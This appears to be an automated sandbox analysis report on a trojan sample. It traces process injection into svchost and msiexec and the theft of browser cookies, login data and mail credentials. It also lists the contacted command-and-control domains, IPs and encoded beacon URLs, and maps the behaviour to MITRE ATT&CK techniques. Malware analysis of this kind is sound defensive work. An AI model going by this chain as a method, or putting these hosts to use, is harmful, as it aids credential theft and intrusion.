            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 2300
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AB1008
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00F81201
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F62BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F62BA5
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F8B226 SendInput,keybd_event, 0_2_00F8B226
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00FA22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00FA22DA
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\0XLuA614VK.exe"
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00F80B62
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F81663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00F81663
            Source: 0XLuA614VK.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: 0XLuA614VK.exe, sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F40698 cpuid 0_2_00F40698
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F98195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00F98195
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F7D27A GetUserNameW,0_2_00F7D27A
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F5B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00F5B952
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F242DE

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: 0XLuA614VK.exe | Binary or memory string: WIN_81
            Source: 0XLuA614VK.exe | Binary or memory string: WIN_XP
            Source: 0XLuA614VK.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: 0XLuA614VK.exe | Binary or memory string: WIN_XPe
            Source: 0XLuA614VK.exe | Binary or memory string: WIN_VISTA
            Source: 0XLuA614VK.exe | Binary or memory string: WIN_7
            Source: 0XLuA614VK.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00FA1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00FA1204
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00FA1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00FA1806
            MITRE ATT&CK Matrix

            One line per tactic; the number shown before a technique is the badge count the report attaches to it, techniques without a number carry no badge.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 312 Process Injection; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 312 Process Injection
            Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1504851  Sample: 0XLuA614VK.exe  Startdate: 05/09/2024  Architecture: WINDOWS  Score: 100

            Start
              DNS/IP: www.yi992.com; www.wildenmann.shop; 19 other IPs or domains
              Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
              0XLuA614VK.exe [4] (started)
                Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
                svchost.exe (started)
                  Signatures: Maps a DLL or memory area into another process
                  sXmdPDASzrmzi.exe (injected)
                    DNS/IP: www.marinamaquiagens.online 15.197.240.20, ports 57196, 57197, 57198, TANDEMUS, United States; www.5a8yly.cfd 72.52.178.23, ports 57192, 57193, 57194, LIQUIDWEBUS, United States; 5 other IPs or domains
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    msiexec.exe [13] (started)
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                      firefox.exe (started)

            Source | Detection | Scanner | Label | Link
            0XLuA614VK.exe | 61% | ReversingLabs | Win32.Trojan.Leonem |
            0XLuA614VK.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ | 0% | Avira URL Cloud | safe |
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
            https://www.namesilo.com/whois | 0% | Avira URL Cloud | safe |
            http://www.cacingnaga36.click/ssw0/ | 0% | Avira URL Cloud | safe |
            http://www.bnmlk.org/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmQ5YTM2NDExYzB | 0% | Avira URL Cloud | safe |
            http://www.whiskeydecanterset.com/wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
            http://www.thecivilwearsprada06.site/2hp8/ | 0% | Avira URL Cloud | safe |
            http://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ | 0% | Avira URL Cloud | safe |
            http://www.cacingnaga36.click/ssw0/?V6h=EWS2YwJnJiunoUuFc/7D9RbaJ3v4wM/73ZiSCzwa3KkaAEYrAxr2MHaEXaA/BV5/vIbe5XGczNGh+M2iNsrtVcMRpqBE9VdECLv8jlI9PFfIoqokrAMGKtNOgnbIBrYWGQ==&sH=nVVHdDTx2PSTVJ | 0% | Avira URL Cloud | safe |
            http://www.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ | 0% | Avira URL Cloud | safe |
            http://www.marinamaquiagens.online/n4sv/?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ | 0% | Avira URL Cloud | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | Avira URL Cloud | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
            http://www.smokesandhoney.com/ld3u/ | 0% | Avira URL Cloud | safe |
            http://www.5a8yly.cfd/kfsd/ | 0% | Avira URL Cloud | safe |
            http://www.bnmlk.org/r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA== | 0% | Avira URL Cloud | safe |
            https://www.namesilo.com | 0% | Avira URL Cloud | safe |
            https://d38psrni17bvxu.cloudfront.net/themes/registrar/images/namesilo.svg | 0% | Avira URL Cloud | safe |
            http://www.yi992.com/iuti/?V6h=hoHbkVcpbob4KKGwTSg4Qmxuxm4KO3ujR6NVpJZRiS90gufBWzA0W/yR6JGFw3H3NTWRULQgnx1gCbPTi357oLTiVxRhMsTUHJ+Wl6jWlVJ6tv3Z5Sqw5Cg13CqV209vow==&sH=nVVHdDTx2PSTVJ | 0% | Avira URL Cloud | safe |
            https://pcnatrk.net/track. | 0% | Avira URL Cloud | safe |
            https://www.ecosia.org/newtab/ | 0% | Avira URL Cloud | safe |
            http://ww1.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqb | 0% | Avira URL Cloud | safe |
            http://ww7.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuq | 0% | Avira URL Cloud | safe |
            https://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9 | 0% | Avira URL Cloud | safe |
            https://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv | 0% | Avira URL Cloud | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | Avira URL Cloud | safe |
            http://www.wildenmann.shop/ccpi/ | 0% | Avira URL Cloud | safe |
            https://www.google.com | 0% | Avira URL Cloud | safe |
            http://www.4odagiyn.click/f1qc/ | 0% | Avira URL Cloud | safe |
            https://www.namesilo.com/domain/search-domains | 0% | Avira URL Cloud | safe |
            http://www.rigintech.info/ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ | 100% | Avira URL Cloud | malware |
            http://www.bnmlk.org/r6tm/ | 0% | Avira URL Cloud | safe |
            http://www.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA== | 0% | Avira URL Cloud | safe |
            http://www.formytinyhome.com/lztc/ | 0% | Avira URL Cloud | safe |
            http://c.parkingcrew.net/scripts/sale_form.js | 0% | Avira URL Cloud | safe |
            http://www.marinamaquiagens.online/n4sv/ | 0% | Avira URL Cloud | safe |
            http://www.4odagiyn.click | 0% | Avira URL Cloud | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | Avira URL Cloud | safe |
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | Avira URL Cloud | safe |
            http://www.rigintech.info/ig9u/ | 100% | Avira URL Cloud | malware |
            http://wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1 | 0% | Avira URL Cloud | safe |
            http://www.yi992.com/iuti/ | 0% | Avira URL Cloud | safe |
            http://www.wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA== | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.rigintech.info | 162.0.213.94 | true | true | | unknown
            869710.parkingcrew.net | 13.248.151.237 | true | true | | unknown
            77980.bodis.com | 199.59.243.226 | true | true | | unknown
            www.wildenmann.shop | 91.203.110.247 | true | true | | unknown
            www.4odagiyn.click | 72.52.178.23 | true | true | | unknown
            www.5a8yly.cfd | 72.52.178.23 | true | true | | unknown
            td-ccm-neg-87-45.wixdns.net | 34.149.87.45 | true | true | | unknown
            www.marinamaquiagens.online | 15.197.240.20 | true | true | | unknown
            www.ios2222abh.top | unknown | unknown | true | | unknown
            www.bnmlk.org | unknown | unknown | true | | unknown
            www.shimakaze-83.cfd | unknown | unknown | true | | unknown
            www.cacingnaga36.click | unknown | unknown | true | | unknown
            198.187.3.20.in-addr.arpa | unknown | unknown | true | | unknown
            www.sugargz.com | unknown | unknown | true | | unknown
            www.whiskeydecanterset.com | unknown | unknown | true | | unknown
            www.yi992.com | unknown | unknown | true | | unknown
            www.smokesandhoney.com | unknown | unknown | true | | unknown
            www.thecivilwearsprada06.site | unknown | unknown | true | | unknown
            www.sandiegosharon.com | unknown | unknown | true | | unknown
            www.formytinyhome.com | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ | true | Avira URL Cloud: safe | unknown
            http://www.thecivilwearsprada06.site/2hp8/ | true | Avira URL Cloud: safe | unknown
            http://www.cacingnaga36.click/ssw0/ | true | Avira URL Cloud: safe | unknown
            http://www.whiskeydecanterset.com/wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== | true | Avira URL Cloud: safe | unknown
            http://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ | true | Avira URL Cloud: safe | unknown
